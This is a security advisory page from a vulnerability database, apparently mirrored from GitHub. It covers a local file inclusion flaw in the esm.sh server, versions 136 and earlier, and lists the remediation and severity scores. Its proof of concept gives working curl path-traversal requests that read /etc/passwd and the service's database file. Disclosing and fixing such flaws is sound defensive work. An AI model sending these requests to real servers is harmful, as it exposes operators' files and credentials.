Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-49pv-gwxp-532r

Опубликовано: 17 сент. 2025
Источник: github
Github: Прошло ревью
CVSS4: 7.7

Описание

esm.sh has File Inclusion issue

Summary

A Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

Severity: High — LFI can expose secrets, configuration files, credentials, or enable further compromise. Impact: reading configuration files, private keys, environment files, or other sensitive files; disclosure of secrets or credentials; information leakage that could enable further attacks.

Vulnerable code snippet is in this file: https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168


Proof of Concept

  1. Using this default config file that I copy from the repo, the server is running at http://localhost:9999 with this command go run server/esmd/main.go --config=config.json
{ "port": 9999, "npmRegistry": "https://registry.npmjs.org/", "npmToken": "******" }
  1. Trigger the LFI vulnerability by sending this command below to read a local file
# read /etc/passwd curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1' # or read the database esm.db file curl --path-as-is 'http://localhost:9999/pr/x/y@99/../../../../../../../esm.db?raw=1&module=1'
poc-image

Remediation

Simply remove any .. in the URL path before actually process the file. See more details in this guide

Credits

Пакеты

Наименование

github.com/esm-dev/esm.sh

go
Затронутые версииВерсия исправления

<= 136

Отсутствует

EPSS

Процентиль: 30%
0.0011
Низкий

7.7 High

CVSS4

Дефекты

CWE-23

Связанные уязвимости

nvd
5 месяцев назад

esm.sh is a nobuild content delivery network(CDN) for modern web development. In 136 and earlier, a Local File Inclusion (LFI) issue was identified in the esm.sh service URL handling. An attacker could craft a request that causes the server to read and return files from the host filesystem (or other unintended file sources).

EPSS

Процентиль: 30%
0.0011
Низкий

7.7 High

CVSS4

Дефекты

CWE-23